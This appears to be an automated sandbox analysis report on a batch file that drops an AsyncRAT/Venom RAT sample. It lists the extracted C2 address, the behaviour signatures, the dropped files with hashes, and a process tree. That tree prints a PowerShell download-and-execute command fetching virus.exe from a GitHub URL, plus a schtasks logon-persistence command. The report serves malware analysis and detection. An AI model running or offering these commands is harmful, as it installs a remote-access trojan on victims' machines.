Analysis

  • max time kernel
    438s
  • max time network
    439s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-12-2024 22:57

General

  • Target

    test.bat

  • Size

    1KB

  • MD5

    b78408977228a09e62dca22d338feafb

  • SHA1

    fac271d4467a36e7ca0b01a81e233e70e200c847

  • SHA256

    7ed2dbc79e11bcea58da5489f14b40343d5d1962afc1dc97a17ee42bf93cd49c

  • SHA512

    37a904d1fb2d03ec32582be38b3a242c63e3ce7f8d1a958327760ba1f8c5545801fb0645b97ff52ca141391bcb7f2ba743f7d11f616a4ba96d0abac6d949cf43

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

66.66.146.74:9511

Mutex

8906005788005HTGF

Attributes
  • delay

    1

  • install

    true

  • install_file

    WINDOWS.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Powershell Invoke Web Request.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\test.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2616
    • C:\Windows\system32\cmd.exe
      cmd /k powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"C:\\Users\\$env:UserName\\AppData\\Local\\Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:452
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "$url = 'https://github.com/Realmastercoder69/realnew/releases/download/das/virus.exe'; $output = \"C:\\Users\\$env:UserName\\AppData\\Local\\Temp\\virus.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3784
        • C:\Users\Admin\AppData\Local\Temp\virus.exe
          "C:\Users\Admin\AppData\Local\Temp\virus.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:852
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"' & exit
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1036
            • C:\Windows\system32\schtasks.exe
              schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"'
              6⤵
              • Scheduled Task/Job: Scheduled Task
              PID:2692
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp75CC.tmp.bat""
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1588
            • C:\Windows\system32\timeout.exe
              timeout 3
              6⤵
              • Delays execution with timeout.exe
              PID:724
            • C:\Users\Admin\AppData\Roaming\WINDOWS.exe
              "C:\Users\Admin\AppData\Roaming\WINDOWS.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:2324
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "WINDOWS"
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:516
                • C:\Windows\system32\schtasks.exe
                  schtasks /delete /f /tn "WINDOWS"
                  8⤵
                    PID:2268
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpEFA7.tmp.bat""
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4308
                  • C:\Windows\system32\timeout.exe
                    timeout 3
                    8⤵
                    • Delays execution with timeout.exe
                    PID:1848

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dpcieayi.qvs.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\tmp75CC.tmp.bat

      Filesize

      151B

      MD5

      9952a4b1ebee27a7e6f425a8d69fa39b

      SHA1

      d0ad514b208439a7aac350987058f1afe1c0c0b0

      SHA256

      2225634980a8deec57a7161c14b6741d14d60f120e8e06b36ba153320f0526ec

      SHA512

      1256f2573a54f9a6d3735c3f34424ae341072d96a336cfed16b42facdcdfc343097f5eab52f271d2c0b513aa049c690de62316dece79ed43cddf4c8a9428e6b3

    • C:\Users\Admin\AppData\Local\Temp\tmpEFA7.tmp.bat

      Filesize

      156B

      MD5

      d982c93cec9338d40f4b7d3463297870

      SHA1

      59aa4c044e577420e8c7bc2a87aad6395eaa2e1d

      SHA256

      a5205ae4f8c2d401aec5c830ae3fb00ee38b3b13c06f48d82e6073a8e83c2503

      SHA512

      be291507248b82d2d4afb8684628542fcc218a346059774fc13a0d4099e55235a7a9bf847ce1dbd1cd0141e42f6578b7b5ec0e83add9d7e7c10a51a9dc9f58aa

    • C:\Users\Admin\AppData\Local\Temp\virus.exe

      Filesize

      74KB

      MD5

      7a545dbf06e65f7f17f04ae0f5153e0e

      SHA1

      ab20193637edd250eac59fd71b6ea2b7a0faaad4

      SHA256

      c3556cd1169de28cb9f6ba3a06a875f756b1bbadfb51b7ce00c92f23d2cd4f5d

      SHA512

      98a56663c90195b0b22df4dcfd72cc4717e445d5eaa2f4571443becbe38a77121835073cbf56377f5cc11849e160dbe9e156fcff8a3fab2efd9aa97a1876d0d1

    • C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

      Filesize

      8B

      MD5

      cf759e4c5f14fe3eec41b87ed756cea8

      SHA1

      c27c796bb3c2fac929359563676f4ba1ffada1f5

      SHA256

      c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761

      SHA512

      c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

    • memory/852-32-0x00007FFB80F40000-0x00007FFB81A01000-memory.dmp

      Filesize

      10.8MB

    • memory/852-24-0x0000000000310000-0x0000000000328000-memory.dmp

      Filesize

      96KB

    • memory/852-25-0x00007FFB80F40000-0x00007FFB81A01000-memory.dmp

      Filesize

      10.8MB

    • memory/852-27-0x00007FFB80F40000-0x00007FFB81A01000-memory.dmp

      Filesize

      10.8MB

    • memory/2324-43-0x000000001C260000-0x000000001C2D6000-memory.dmp

      Filesize

      472KB

    • memory/2324-44-0x000000001C1E0000-0x000000001C246000-memory.dmp

      Filesize

      408KB

    • memory/2324-45-0x000000001C240000-0x000000001C25E000-memory.dmp

      Filesize

      120KB

    • memory/3784-11-0x00007FFB80F40000-0x00007FFB81A01000-memory.dmp

      Filesize

      10.8MB

    • memory/3784-0-0x00007FFB80F43000-0x00007FFB80F45000-memory.dmp

      Filesize

      8KB

    • memory/3784-38-0x00007FFB80F43000-0x00007FFB80F45000-memory.dmp

      Filesize

      8KB

    • memory/3784-39-0x00007FFB80F40000-0x00007FFB81A01000-memory.dmp

      Filesize

      10.8MB

    • memory/3784-42-0x00007FFB80F40000-0x00007FFB81A01000-memory.dmp

      Filesize

      10.8MB

    • memory/3784-12-0x00007FFB80F40000-0x00007FFB81A01000-memory.dmp

      Filesize

      10.8MB

    • memory/3784-1-0x000002B7FE280000-0x000002B7FE2A2000-memory.dmp

      Filesize

      136KB

    • memory/3784-52-0x00007FFB80F40000-0x00007FFB81A01000-memory.dmp

      Filesize

      10.8MB